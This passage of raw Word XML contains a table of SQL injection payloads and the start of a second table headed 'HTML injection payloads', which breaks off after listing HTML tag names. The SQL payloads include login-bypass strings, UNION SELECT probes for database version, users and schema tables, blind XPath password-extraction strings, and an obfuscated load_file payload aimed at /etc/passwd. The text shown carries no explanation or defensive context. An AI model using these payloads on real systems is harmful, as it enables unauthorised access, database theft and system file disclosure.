                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or ("1"="1"/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="096B0EF9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or ("1"="1"#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2A0B52" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>) or '1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>='1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470130B7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>) or ('1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>='1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B6B3ED" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1 LIMIT 1;#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63213D99" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'or 1=1 or ''='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D4500C2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"or 1=1 or ""="</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3AD4B7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 'a'='a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AFF39D7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or a=a--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5A99E9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or a=a–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACF7150" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('a'='a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433AD2AB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or "a"="a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B0C456" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>") or ("a"="a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1268E565" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('a'='a and hi") or ("a"="a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D351879" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 'one'='one</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F8D06B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 'one'='one–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C607961" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or uid like '%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C1D5647" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or uname like '%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C83CC0B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or userid like '%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37378B5A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or user like '%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68E9CEDD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or username like '%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB1E5F3" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 'x'='x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FCF8A2B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>') or ('x'='x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F48D3B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or "x"="x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDAE2C7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' OR 'x'='x'#;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773ADE08" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'=' 'or' and '=' 'or'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2864CEC5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' UNION ALL SELECT 1, @@version;#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5D2AC4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' UNION ALL SELECT system_user(),user();#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="173E7AD2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' UNION select table_schema,table_name FROM information_Schema.tables;#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52FA870E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>admin' and substring(password/text(),1,1)='7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="701C09D6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' and substring(password/text(),1,1)='7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB24A34" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 1=1 limit 1 -- -+</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18D5A9A6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'="or'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57DA096A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' SELECT user FROM mysql.user;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D62D44B" w14:textId="62A8059E" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'+union+all+select+load_file('%2Fetc%2Fpas%24{gsh[%24{ssss[%24{gg}]}]}swd')%2Cnull+%23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E8CFE07" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637245FC" w14:textId="18AF9100" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225A7EF9" w14:textId="04C5E55C" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36FCB82A" w14:textId="13526A7A" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTML injection payloads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C3F72" w14:paraId="78F6BC60" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31E1635C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>!-- --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EADA161" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>!DOCTYPE html</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5614E1BA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A246E17" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>abbr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A05A2B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CB02087" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>area</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BDCAD04" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>article</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE6415A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>aside</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B65FDCC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>audio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12C66EBA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
